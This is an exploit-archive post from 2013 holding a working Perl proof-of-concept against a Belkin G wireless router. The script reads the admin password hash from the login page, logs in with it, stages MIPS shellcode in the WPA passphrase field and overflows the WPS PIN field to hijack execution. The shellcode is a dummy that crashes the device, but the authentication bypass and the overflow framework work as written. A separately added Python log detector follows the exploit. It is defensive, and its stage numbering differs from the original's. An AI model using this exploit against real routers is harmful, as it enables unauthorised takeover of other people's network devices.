Belkin G Wireless Router Code Execution

Posted Aug 26, 2013
Authored by Aodrulez

Belkin G Wireless Router remote code execution proof of concept exploit.

tags | exploit, remote, code execution, proof of concept
SHA-256 | 43beacbd1d2f3672fb7be34a7a3f2b6f9fabf3623fbe5cb404ae146733cc6365

+-----------------------------------+
| Belkin G Wireless Router RCE PoC. |
+-----------------------------------+



Firmware Version : 5.00.12 (Sep 10 2009 19:54:12)
Boot Version : 1.18
Hardware : F5D7234-4 v5 (01)
Author : Aodrulez.
Email : atul.alex@orchidseven.com
Twitter : http://twitter.com/Aodrulez


+---------+
| Details |
+---------+

The exploit works in 3 stages.
1. Authentication.
2. Setting up shellcode in the memory at a known location.
3. Triggering an RA register over-write to execute the shellcode.

This particular router model runs the embedded Configurable operating system (eCos) version 2.0. The shellcode used in the exploit is a dummy one: it just triggers an exception and crashes the router, forcing it to reboot.


Video Demo :
http://www.youtube.com/watch?v=MtrYs-f6X3E


+---------+
| Exploit |
+---------+

#!/usr/bin/perl

use strict;
use warnings;
use LWP 5.64;
$| = 1;

# Variable declarations.
my $browser  = LWP::UserAgent->new;
my $passHash = "";
my $url      = "";
my $response = "";
my $ip       = "";
$browser->timeout(10);

# Just a few nops followed by a dummy shellcode that crashes & reboots the router.
my $shellcode = "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x04\xd0\xff\xff\x20\x20\x20\x20";

sub Authenticate
{
    print "[+] Trying to authenticate.\n";
    $url      = "http://$ip/login.stm";
    $response = $browser->get($url);
    my @aod = $response->content =~ m/var password = "(.*)";/g;
    if (!$aod[0])
    {
        print "[-] Damn! Something went wrong. This might not work here :-/\n";
        exit;
    }
    else
    {
        $passHash = $aod[0];
        print "[+] Admin Password = $passHash (MD5 Hash).\n";
    }

    print "[+] Time to authenticate you!\n";
    $url      = "http://$ip/cgi-bin/login.exe";
    $response = $browser->post($url,
        [ 'totalMSec' => "1377121454.99",
          'pws'       => "$passHash",
        ]
    );

    if ($response->content =~ /index/)
    {
        print "[+] Logged in successfully as 'Admin'!\n";
        print "[!] Open this link in a browser for admin access : http://$ip/setup.htm \n";
    }
    else
    {
        print "[-] Login failed! This might not work here :-/\n";
        exit;
    }

    print "\n[+] Continue with exploitation? (Y/N) : ";
    my $temp = <STDIN>;
    if ($temp =~ /[Yy]/)
    {
        Exploit();
    }
    else
    {
        print "[+] Have fun!\n\n";
        exit;
    }
}

sub Exploit
{
    # Stage 1: Fill shellcode at a known location : 0x803c0278 (Buffer=120 bytes)
    # 0x803c0278 is fixed for this device/firmware combination.
    print "[+] Stage 1 : Allocating shellcode.\n";

    if (length($shellcode) > 120)
    {
        print "[-] Shellcode is too big! (120 bytes Max)\n";
        exit;
    }
    print "[+] Shellcode length : " . length($shellcode) . "\n";

    # Fill the rest with nops. Not needed but good to have.
    # Shellcode size should be ideally a multiple of 4 as this is MIPS.
    my $nopsize = 120 - length($shellcode);
    $shellcode = $shellcode . ("\x20" x $nopsize);

    $url      = "http://$ip/cgi-bin/wireless_WPA.exe";
    $response = $browser->post($url,
        [ 'wpa_authen'       => "1",
          'wpa_psk'          => '0',
          's_rekeysec'       => '900000',
          's_rekeypkt'       => '1000',
          'w802_rekey'       => '0',
          'encryption'       => '3',
          'security_type'    => '4',
          'authentication'   => '3',
          'encryption_hid'   => '3',
          'wpa_key_text'     => "ssss",
          'wpa_key_pass'     => "$shellcode",
          'obscure_psk'      => '1',
          'sharedkey_alter'  => '',
          'sharedkey_alter1' => '1',
        ]
    );

    if (!$response->content)
    {
        print "[-] Damn! Something went wrong. This might not work here :-/\n";
    }
    else
    {
        print "[+] Stage 1 seems to have gone well.\n";
    }

    # Stage 2: Trigger Stack Overflow & overwrite RA
    print "[+] Stage 2 : Triggering Return Address overwrite.\n";

    my $junk = "A" x 32;
    my $s0   = "BBBB";
    my $s1   = "CCCC";
    my $ra   = "\x78\x02\x3c\x80";    # EPC -> 0x803c0278 Fixed for this device/firmware combination.
    my $nop  = "\x20\x20\x20\x20";
    my $payload = $junk . $s0 . $s1 . $ra . $nop;

    $url      = "http://$ip/cgi-bin/wireless_WPS_Enroll.exe";
    $response = $browser->post($url, [ 'pin' => "$payload" ]);
    if (!$response->content)
    {
        print "[-] Damn! Something went wrong. This might not work here :-/\n";
    }
    else
    {
        print "[-] Done! \\m/\n";
    }
}

sub Welcome
{
    print "\n\n+------------------------------------------+\n";
    print "| Belkin G Wireless Router Remote Exploit |\n";
    print "| (Authentication bypass & RCE PoC) |\n";
    print "+------------------------------------------+\n";
    print "[+] By Aodrulez.\n";
    print "\n[+] Usage : perl $0 router_ip";
    print "\n[!] Example : perl $0 192.168.2.1";

    if (!$ARGV[0])
    {
        print "\n[-] (o_0) Seriously??\n";
        exit;
    }

    $ip = $ARGV[0];
    print "\n[+] Target IP : $ip\n";
}

# Burn!!
Welcome();
Authenticate();
# End of exploit code.
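As an added defender-side example (not part of the advisory or Aodrulez's PoC), the following Python flags the request shapes that stages 2 and 3 above produce: a WPA passphrase field carrying binary or oversized data, and a WPS PIN field that is neither short nor numeric. It assumes an HTTP capture taken in front of the router (IDS or proxy), since the device itself keeps no such log, in a constructed one-line-per-request format.

```python
# Added example, not part of the original advisory or the author's PoC. Assumes an HTTP
# capture in front of the router in a constructed format: "<client> <METHOD> <path> [<body>]".
from urllib.parse import unquote_to_bytes
WPS_PIN_MAX = 8    # a WPS PIN is 4 or 8 decimal digits
WPA_PSK_MAX = 63   # a WPA passphrase is 8..63 printable ASCII bytes

def decode_form(body):
    """Decode a form-urlencoded body to {name: raw bytes}; values stay bytes
    so non-UTF-8 sequences such as \\xd0\\xff in the PoC survive decoding."""
    params = {}
    for pair in filter(None, body.split("&")):
        name, _, value = pair.partition("=")
        params[name] = unquote_to_bytes(value.replace("+", " "))
    return params

def is_printable_ascii(data):
    return all(0x20 <= b <= 0x7E for b in data)

def classify(line):
    """Return (client, path, reason) findings for one request; [] if clean."""
    parts = line.strip().split(" ", 3)
    client, method, path = parts[:3]
    params = decode_form(parts[3]) if method == "POST" and len(parts) > 3 else {}
    findings = []
    # Stage 2 of the PoC parks machine code in the passphrase field, so the
    # value is either longer than any valid PSK or contains non-printable bytes.
    psk = params.get("wpa_key_pass")
    if path == "/cgi-bin/wireless_WPA.exe" and psk is not None and (
            len(psk) > WPA_PSK_MAX or not is_printable_ascii(psk)):
        findings.append((client, path, "wpa_key_pass oversized or binary: shellcode staging"))
    # Stage 3 overflows the WPS PIN with filler plus a return address.
    pin = params.get("pin")
    if path == "/cgi-bin/wireless_WPS_Enroll.exe" and pin is not None and (
            len(pin) > WPS_PIN_MAX or not pin.isdigit()):
        findings.append((client, path, "pin overlong or non-numeric: RA overwrite attempt"))
    return findings

def scan(log_text):
    return [f for line in log_text.splitlines() if line.strip() for f in classify(line)]

# Constructed sample: the PoC's stages from 10.0.0.5, then two benign requests from
# 10.0.0.9. The login stage looks like a normal admin login and is not flagged by shape.
SAMPLE_LOG = """
10.0.0.5 POST /cgi-bin/login.exe totalMSec=1377121454.99&pws=0123456789abcdef0123456789abcdef
10.0.0.5 POST /cgi-bin/wireless_WPA.exe wpa_authen=1&wpa_key_text=ssss&wpa_key_pass=%20%20%20%20%20%20%20%20%20%20%20%20%04%d0%ff%ff%20%20%20%20
10.0.0.5 POST /cgi-bin/wireless_WPS_Enroll.exe pin=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC%78%02%3c%80%20%20%20%20
10.0.0.9 POST /cgi-bin/wireless_WPS_Enroll.exe pin=12345670
10.0.0.9 POST /cgi-bin/wireless_WPA.exe wpa_key_pass=correct+horse+battery
"""
```

Running `scan(SAMPLE_LOG)` yields exactly two findings, both from 10.0.0.5, one per exploit stage; the benign PIN and passphrase pass untouched.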



+-------------------+
| Greetz Fly Out To |
+-------------------+


1] Amforked() : My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.nsd.org.in


+-------+
| Quote |
+-------+

“I would rather die of passion than of boredom.” - Vincent van Gogh.